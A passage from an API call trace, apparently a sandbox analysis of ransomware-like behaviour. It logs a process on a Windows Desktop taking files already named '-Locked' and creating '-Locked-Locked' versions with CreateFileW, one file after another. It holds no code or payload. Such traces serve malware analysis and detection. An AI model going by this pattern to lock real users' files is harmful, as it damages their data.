lpFilePart=0x0) returned 0x3d [0304.747] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0304.749] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d-a24dz0snVX.xlsx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d-a24dz0snvx.xlsx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.754] GetFileType (hFile=0x49c) returned 0x1 [0304.754] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0304.754] GetFileType (hFile=0x49c) returned 0x1 [0304.756] CloseHandle (hObject=0x49c) returned 1 [0304.757] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\desktop.ini-Locked", lpFilePart=0x0) returned 0x30 [0304.757] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\desktop.ini-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\desktop.ini-Locked-Locked", lpFilePart=0x0) returned 0x37 [0304.757] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0304.757] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\desktop.ini-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\desktop.ini-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.760] GetFileType (hFile=0x49c) returned 0x1 [0304.760] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0304.760] GetFileType (hFile=0x49c) returned 0x1 [0304.762] CloseHandle (hObject=0x49c) returned 1 [0304.765] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\G2jIFnab-iHgfnotUdc.wav-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\G2jIFnab-iHgfnotUdc.wav-Locked", lpFilePart=0x0) returned 0x3c [0304.765] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\G2jIFnab-iHgfnotUdc.wav-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\G2jIFnab-iHgfnotUdc.wav-Locked-Locked", lpFilePart=0x0) returned 0x43 [0304.765] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0304.765] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\G2jIFnab-iHgfnotUdc.wav-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\g2jifnab-ihgfnotudc.wav-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.801] GetFileType (hFile=0x49c) returned 0x1 [0304.801] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0304.801] GetFileType (hFile=0x49c) returned 0x1 [0304.803] CloseHandle (hObject=0x49c) returned 1 [0304.804] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\h aXUsMO6g.png-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\h aXUsMO6g.png-Locked", lpFilePart=0x0) returned 0x33 [0304.804] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\h aXUsMO6g.png-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\h aXUsMO6g.png-Locked-Locked", lpFilePart=0x0) returned 0x3a [0304.804] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0304.804] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\h aXUsMO6g.png-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\h axusmo6g.png-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.841] GetFileType (hFile=0x49c) returned 0x1 [0304.841] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0304.842] GetFileType (hFile=0x49c) returned 0x1 [0304.844] CloseHandle (hObject=0x49c) returned 1 [0304.844] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HElJnZ.bmp-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HElJnZ.bmp-Locked", lpFilePart=0x0) returned 0x2f [0304.845] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HElJnZ.bmp-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HElJnZ.bmp-Locked-Locked", lpFilePart=0x0) returned 0x36 [0304.845] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0304.845] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HElJnZ.bmp-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\heljnz.bmp-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.945] GetFileType (hFile=0x49c) returned 0x1 [0304.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0304.945] GetFileType (hFile=0x49c) returned 0x1 [0304.946] CloseHandle (hObject=0x49c) returned 1 [0304.947] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HhodZgzF8 9dLBFX.avi-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HhodZgzF8 9dLBFX.avi-Locked", lpFilePart=0x0) returned 0x39 [0304.947] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HhodZgzF8 9dLBFX.avi-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HhodZgzF8 9dLBFX.avi-Locked-Locked", lpFilePart=0x0) returned 0x40 [0304.947] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0304.947] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HhodZgzF8 9dLBFX.avi-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\hhodzgzf8 9dlbfx.avi-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.958] GetFileType (hFile=0x49c) returned 0x1 [0304.958] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0304.958] GetFileType (hFile=0x49c) returned 0x1 [0304.960] CloseHandle (hObject=0x49c) returned 1 [0304.961] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\iWyhboFMJLgPq_b7Ud9.avi-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\iWyhboFMJLgPq_b7Ud9.avi-Locked", lpFilePart=0x0) returned 0x3c [0304.961] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\iWyhboFMJLgPq_b7Ud9.avi-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\iWyhboFMJLgPq_b7Ud9.avi-Locked-Locked", lpFilePart=0x0) returned 0x43 [0304.961] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0304.961] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\iWyhboFMJLgPq_b7Ud9.avi-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\iwyhbofmjlgpq_b7ud9.avi-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.970] GetFileType (hFile=0x49c) returned 0x1 [0304.970] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0304.970] GetFileType (hFile=0x49c) returned 0x1 [0304.973] CloseHandle (hObject=0x49c) returned 1 [0304.974] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\IZrQfjN.m4a-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\IZrQfjN.m4a-Locked", lpFilePart=0x0) returned 0x30 [0304.974] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\IZrQfjN.m4a-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\IZrQfjN.m4a-Locked-Locked", lpFilePart=0x0) returned 0x37 [0304.974] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0304.974] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\IZrQfjN.m4a-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\izrqfjn.m4a-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.994] GetFileType (hFile=0x49c) returned 0x1 [0304.994] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0304.994] GetFileType (hFile=0x49c) returned 0x1 [0304.996] CloseHandle (hObject=0x49c) returned 1 [0304.997] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L0Cw.docx-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L0Cw.docx-Locked", lpFilePart=0x0) returned 0x2e [0304.997] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L0Cw.docx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L0Cw.docx-Locked-Locked", lpFilePart=0x0) returned 0x35 [0304.997] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0304.997] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L0Cw.docx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\l0cw.docx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.106] GetFileType (hFile=0x49c) returned 0x1 [0305.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0305.106] GetFileType (hFile=0x49c) returned 0x1 [0305.107] CloseHandle (hObject=0x49c) returned 1 [0305.108] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L3CXAN4c0b0rw2-.mkv-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L3CXAN4c0b0rw2-.mkv-Locked", lpFilePart=0x0) returned 0x38 [0305.108] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L3CXAN4c0b0rw2-.mkv-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L3CXAN4c0b0rw2-.mkv-Locked-Locked", lpFilePart=0x0) returned 0x3f [0305.108] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0305.108] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L3CXAN4c0b0rw2-.mkv-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\l3cxan4c0b0rw2-.mkv-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.109] GetFileType (hFile=0x49c) returned 0x1 [0305.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0305.109] GetFileType (hFile=0x49c) returned 0x1 [0305.111] CloseHandle (hObject=0x49c) returned 1 [0305.111] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L_wFYu3lS.pptx-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L_wFYu3lS.pptx-Locked", lpFilePart=0x0) returned 0x33 [0305.111] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L_wFYu3lS.pptx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L_wFYu3lS.pptx-Locked-Locked", lpFilePart=0x0) returned 0x3a [0305.111] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0305.111] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L_wFYu3lS.pptx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\l_wfyu3ls.pptx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.112] GetFileType (hFile=0x49c) returned 0x1 [0305.112] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0305.112] GetFileType (hFile=0x49c) returned 0x1 [0305.114] CloseHandle (hObject=0x49c) returned 1 [0305.114] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\MyZQDkF.mp3-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\MyZQDkF.mp3-Locked", lpFilePart=0x0) returned 0x30 [0305.114] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\MyZQDkF.mp3-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\MyZQDkF.mp3-Locked-Locked", lpFilePart=0x0) returned 0x37 [0305.114] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0305.114] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\MyZQDkF.mp3-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\myzqdkf.mp3-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.116] GetFileType (hFile=0x49c) returned 0x1 [0305.116] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0305.116] GetFileType (hFile=0x49c) returned 0x1 [0305.118] CloseHandle (hObject=0x49c) returned 1 [0305.118] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\nRKT5nI-9Sno8sTzM1P5.wav-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\nRKT5nI-9Sno8sTzM1P5.wav-Locked", lpFilePart=0x0) returned 0x3d [0305.118] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\nRKT5nI-9Sno8sTzM1P5.wav-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\nRKT5nI-9Sno8sTzM1P5.wav-Locked-Locked", lpFilePart=0x0) returned 0x44 [0305.118] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0305.118] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\nRKT5nI-9Sno8sTzM1P5.wav-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\nrkt5ni-9sno8stzm1p5.wav-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.119] GetFileType (hFile=0x49c) returned 0x1 [0305.119] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0305.119] GetFileType (hFile=0x49c) returned 0x1 [0305.120] CloseHandle (hObject=0x49c) returned 1 [0305.121] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\OqWYTp.bmp-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\OqWYTp.bmp-Locked", lpFilePart=0x0) returned 0x2f [0305.121] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\OqWYTp.bmp-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\OqWYTp.bmp-Locked-Locked", lpFilePart=0x0) returned 0x36 [0305.121] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0305.121] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\OqWYTp.bmp-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\oqwytp.bmp-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.121] GetFileType (hFile=0x49c) returned 0x1 [0305.121] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0305.122] GetFileType (hFile=0x49c) returned 0x1 [0305.123] CloseHandle (hObject=0x49c) returned 1 [0305.123] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SkBr_ODTO7.ppt-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SkBr_ODTO7.ppt-Locked", lpFilePart=0x0) returned 0x33 [0305.123] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SkBr_ODTO7.ppt-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SkBr_ODTO7.ppt-Locked-Locked", lpFilePart=0x0) returned 0x3a [0305.123] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0305.127] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SkBr_ODTO7.ppt-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\skbr_odto7.ppt-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.127] GetFileType (hFile=0x49c) returned 0x1 [0305.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0305.127] GetFileType (hFile=0x49c) returned 0x1 [0305.129] CloseHandle (hObject=0x49c) returned 1 [0305.129] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SoNi.jpg-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SoNi.jpg-Locked", lpFilePart=0x0) returned 0x2d [0305.129] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SoNi.jpg-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SoNi.jpg-Locked-Locked", lpFilePart=0x0) returned 0x34 [0305.129] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0305.129] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SoNi.jpg-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\soni.jpg-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.130] GetFileType (hFile=0x49c) returned 0x1 [0305.130] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0305.130] GetFileType (hFile=0x49c) returned 0x1 [0305.132] CloseHandle (hObject=0x49c) returned 1 [0305.132] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sTLRgmy.flv-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sTLRgmy.flv-Locked", lpFilePart=0x0) returned 0x30 [0305.132] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sTLRgmy.flv-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sTLRgmy.flv-Locked-Locked", lpFilePart=0x0) returned 0x37 [0305.132] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0305.132] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sTLRgmy.flv-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\stlrgmy.flv-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.133] GetFileType (hFile=0x49c) returned 0x1 [0305.133] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0305.133] GetFileType (hFile=0x49c) returned 0x1 [0305.135] CloseHandle (hObject=0x49c) returned 1 [0305.135] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\tmhBBPCr.mp4-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\tmhBBPCr.mp4-Locked", lpFilePart=0x0) returned 0x31 [0305.135] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\tmhBBPCr.mp4-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\tmhBBPCr.mp4-Locked-Locked", lpFilePart=0x0) returned 0x38 [0305.135] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0305.135] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\tmhBBPCr.mp4-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\tmhbbpcr.mp4-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.136] GetFileType (hFile=0x49c) returned 0x1 [0305.136] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0305.136] GetFileType (hFile=0x49c) returned 0x1 [0305.137] CloseHandle (hObject=0x49c) returned 1 [0305.138] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\TujlyxlbhAxVP9v1.mp4-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\TujlyxlbhAxVP9v1.mp4-Locked", lpFilePart=0x0) returned 0x39 [0305.138] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\TujlyxlbhAxVP9v1.mp4-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\TujlyxlbhAxVP9v1.mp4-Locked-Locked", lpFilePart=0x0) returned 0x40 [0305.138] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0305.138] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\TujlyxlbhAxVP9v1.mp4-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\tujlyxlbhaxvp9v1.mp4-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.138] GetFileType (hFile=0x49c) returned 0x1 [0305.138] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0305.138] GetFileType (hFile=0x49c) returned 0x1 [0305.140] CloseHandle (hObject=0x49c) returned 1 [0305.140] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\V0zO8w_tvkIQjvRX6KqC.jpg-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\V0zO8w_tvkIQjvRX6KqC.jpg-Locked", lpFilePart=0x0) returned 0x3d [0305.140] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\V0zO8w_tvkIQjvRX6KqC.jpg-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\V0zO8w_tvkIQjvRX6KqC.jpg-Locked-Locked", lpFilePart=0x0) returned 0x44 [0305.140] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0305.140] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\V0zO8w_tvkIQjvRX6KqC.jpg-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\v0zo8w_tvkiqjvrx6kqc.jpg-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.140] GetFileType (hFile=0x49c) returned 0x1 [0305.141] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0305.141] GetFileType (hFile=0x49c) returned 0x1 [0305.142] CloseHandle (hObject=0x49c) returned 1 [0305.147] GetFullPathNameW (in: 